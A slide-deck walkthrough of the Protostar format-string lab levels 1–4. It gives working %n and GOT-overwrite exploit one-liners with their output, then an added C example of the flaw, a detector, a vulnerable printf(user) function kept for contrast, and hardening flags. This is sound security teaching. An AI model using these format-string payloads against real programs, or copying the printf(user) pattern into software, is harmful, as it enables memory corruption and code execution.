Tachikoma 2013-01

  1. Tachikoma January (Monday, January 28, 13)
  2. Agenda
     • Fusion lv.02, 03, 04
     • 5 minutes python
  3. (no text)
  4. WTF!?
  5. Agenda
     • Fusion lv.02, 03, 04
     • 5 minutes python
  6. Agenda
     • Protostar format lv.01, 02, 03, 04
     • 5 minutes python
  7. Agenda
     • Protostar format lv.01, 02, 03, 04
     • Forgive me for doing rather a lot of these...
     • 5 minutes python
     • import "university assignment"
  8. Protostar format 1
  9. Protostar format 1
     • All we have to do is overwrite int target
     • In C, global variables are initialized to 0
     • Goal: set it to anything other than 0
  10. Protostar format 1
     • Looks like we just have to vary argv[1]
     • Find how far we have to pop before it shows up
     • It is an int, so 4 bytes
     • AAAA%x....
     • Can't find it by hand...
  11. Protostar format 1
  12. Protostar format 1
     • Around 132?
     • printf("AAAA%132%x", <- same as that);
     • Apparently that is what it ends up as?
  13. Protostar format 1
     • Let's use %n to overwrite it with whatever
     • ./format1 `python -c 'print "\x38\x96\x04\x08xx%132$n"'`
     • 8xxyou have modified the target :)
  14. Protostar format 2
  15. Protostar format 2
     • What changed
     • Input comes from stdin instead of argv
     • Apparently target has to be set to 64
  16. Protostar format 2
     • Pop and search, same as in 1
     • user@protostar:/opt/protostar/bin$ echo "AAAA%x,%x,%x,%x" | ./format2
     • AAAA200,b7fd8420,bffff564,41414141
     • target is 0 :(
     • This time four is enough
  17. Protostar format 2
     • Address of target
     • user@protostar:/opt/protostar/bin$ objdump -t ./format2 | grep target
     • 080496e4 g O .bss 00000004 target
     • Try it the same way as in 1
     • user@protostar:/opt/protostar/bin$ python -c 'print "\xe4\x96\x04\x08%4$n"' | ./format2
     • ?
     • target is 4 :(
  18. Protostar format 2
     • target became 4!
     • %n is the number of characters written so far, right!
     • Try it
     • user@protostar:/opt/protostar/bin$ python -c 'print "\xe4\x96\x04\x08x%4$n"' | ./format2
     • x
     • target is 5 :(
  19. Protostar format 2
     • Try once more
     • user@protostar:/opt/protostar/bin$ python -c 'print "\xe4\x96\x04\x08xx%4$n"' | ./format2
     • xx
     • target is 6 :(
     • And 64-4=60, so...
     • user@protostar:/opt/protostar/bin$ python -c 'print "\xe4\x96\x04\x08"+ "x"*60 +"%4$n"' | ./format2
     • xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
     • you have modified the target :)
  20. Protostar format 3
  21. Protostar format 3
     • What changed
     • printf() is not called directly; it goes through printbuffer(char *)
     • We have to write a lot more
  22. Protostar format 3
     • Try the same thing for now
     • user@protostar:/opt/protostar/bin$ echo "AAAA%x,%x,%x,%x" | ./format3
     • AAAAxx0,bffff520,b7fd7ff4,0
     • target is 00000000 :(
  25. Protostar format 3
     • Very well then, Python it is
     • user@protostar:/opt/protostar/bin$ python -c 'print "AAAA"+",%x"*16' | ./format3
     • AAAAxx, 0,bffff520,b7fd7ff4,0,0,bffff728,804849d,bffff520,200,b7fd8420,bffff564,41414141,252c7878,78252c78,2c78252c,252c7825
     • target is 00000000 :(
     • It was the 12th one
  26. Protostar format 3
     • Address of target
     • user@protostar:/opt/protostar/bin$ objdump -t ./format3 | grep target
     • 080496f4 g O .bss 00000004 target
  27. Protostar format 3
     • Try it
     • python -c 'print "\xf4\x96\x04\x08" + "x"*256 + "%12$n"' | ./format3
     • xxxxxxxxxxxxxxxxxxxxx(snip)
     • target is 00000104 :(
     • Doesn't work
  28. Protostar format 3
     • It's multi-byte!
     • Just do the same calculation for each byte!
  29. • Try it
     • python -c 'print "\xf4\x96\x04\x08\xf5\x96\x04\x08\xf6\x96\x04\x08%12$n%13$n%14$n"' | ./format3
     • ?
     • target is 000c0c0c :(
  30. • Add various amounts
     • python -c 'print "\xf4\x96\x04\x08\xf5\x96\x04\x08\xf6\x96\x04\x08" + "x"*56 + "%12$n" + "x"*17 + "%13$n" + "x"*173 + "%14$n"' | ./format3
     • xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx(snip)
     • you have modified the target :)
  31. Protostar format 4
  32. Protostar format 4
     • What changed
     • Overwrite the GOT instead of target
     • Goal
     • call hello()
  33. Protostar format 4
     • Address of hello
     • # objdump -d ./format4 | grep hello [/opt/protostar/bin]
     • 080484b4 <hello>:
  36. Protostar format 4
     • pop, pop, pop...
     • python -c 'print "AAAA" + ",%x"*4' | ./format4
     • AAAA,200,b7fd8420,bffff9c4,41414141
     • It was the 4th one
  37. Protostar format 4
     • Approach
     • Make it so that when exit() is about to be called, hello() gets called instead
  38. Protostar format 4
     • objdump -R ./format4 |grep exit
     • 08049718 R_386_JUMP_SLOT _exit
     • 08049724 R_386_JUMP_SLOT exit
  39. Protostar format 4
     • We just have to overwrite 0x08049724 with hello(), so...
     • python -c 'print "\x24\x97\x04\x08\x25\x97\x04\x08\x27\x97\x04\x08" + "x"*168 + "%4$hn" + "x"*976 + "%5$hn" + "x"*132 + "%6$hn"' | ./format4
     • [1] 4950 done python -c |
     • 4951 segmentation fault ./format4
     • Did you mean: input too long
  40. Protostar format 4
     • Google("help me");
     • If you write %nd (n being any integer) you can pad with 0, right
     • Apparently this is how you normally pad n bytes...
  41. Protostar format 4
     • Try again
     • python -c 'print "\x24\x97\x04\x08\x25\x97\x04\x08\x27\x97\x04\x08" + "x"*168 + "%4$hn%976d%5$hn" + "x"*132 + "%6$hn"' | ./format4
     • $ %xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx(snip)
     • code execution redirected! you win
  42. Protostar format 4
     • It worked, somehow.
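
The printf behaviour the whole deck turns on, as an added C example that is not part of the original slides or of the Protostar exercises: `bytes_before_n` reproduces the byte-count arithmetic behind `%n` (slides 18 and 19) and the `%976d` padding trick from slide 40 using a literal format string, so the count is returned rather than written through an attacker-chosen pointer; `count_directives` flags untrusted text that a `*printf` call would interpret as directives; `render_untrusted` is the one-line fix for the `printf(buffer)` pattern the levels are built around, with the vulnerable form kept beside it for comparison. All function names are my own.

```c
#include <stdio.h>
#include <string.h>

/*
 * %n stores the number of bytes emitted *so far* into the int it points at.
 * The slides derive this by hand: 4 address bytes + 60 'x' characters = 64.
 * "%*d" with a width argument emits exactly pad_width characters (a single
 * '0' right-justified in that field), which is the "%976d" idea from slide
 * 40: width padding costs no input bytes, unlike a run of literal 'x'.
 * The format string is a literal here, so glibc's FORTIFY check (which
 * aborts on %n inside a writable format string) does not fire.
 */
int bytes_before_n(const char *prefix, int pad_width)
{
    char out[4096];          /* large enough for every width used below */
    int written = -1;
    if (pad_width < 1 || pad_width > 2048)
        return -1;           /* keep the demo inside the buffer */
    snprintf(out, sizeof out, "%s%*d%n", prefix, pad_width, 0, &written);
    return written;          /* prefix length + pad_width */
}

/*
 * Count conversion directives in untrusted text: any '%' not part of "%%".
 * A non-zero result for data that is about to become a format argument is
 * the condition every Protostar format level exploits.
 */
int count_directives(const char *s)
{
    int n = 0;
    for (const char *p = s; *p; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {   /* "%%" prints a literal percent sign */
            p++;
            continue;
        }
        n++;
    }
    return n;
}

/* The bug as it appears in the levels: user data *is* the format string.
 * -Wformat-security warns on this line; never call it with untrusted input. */
void vulnerable_print(const char *user)
{
    printf(user);
}

/* The fix: user data is only ever an argument. Every '%' in it is printed
 * literally and nothing is read from (or written to) the stack. */
int render_untrusted(const char *user, char *out, size_t outsz)
{
    return snprintf(out, outsz, "%s", user);
}

/* 1 when render_untrusted reproduces `user` byte for byte, i.e. no
 * directive in it was interpreted. */
int renders_literally(const char *user)
{
    char out[256];
    render_untrusted(user, out, sizeof out);
    return strcmp(out, user) == 0;
}

int main(void)
{
    /* Constructed inputs mirroring the probes on slides 16 and 19. */
    printf("4 address bytes + 60 pad: %%n would store %d\n",
           bytes_before_n("AAAA", 60));
    printf("directives in \"AAAA%%x,%%x,%%x,%%x\": %d\n",
           count_directives("AAAA%x,%x,%x,%x"));
    printf("safe render of \"%%4$n\" is literal: %d\n",
           renders_literally("%4$n"));
    return 0;
}
```

Build the real program with the same defences a hardened Protostar binary would have and each step of the deck stops working at a different layer: `-Wformat -Wformat-security` flags `printf(buffer)` at compile time, `-D_FORTIFY_SOURCE=2` (with optimisation) makes glibc abort on `%n` in a writable format string, and full RELRO (`-Wl,-z,relro,-z,now`) maps the GOT read-only after relocation, which is what the format 4 overwrite of the `exit` slot depends on.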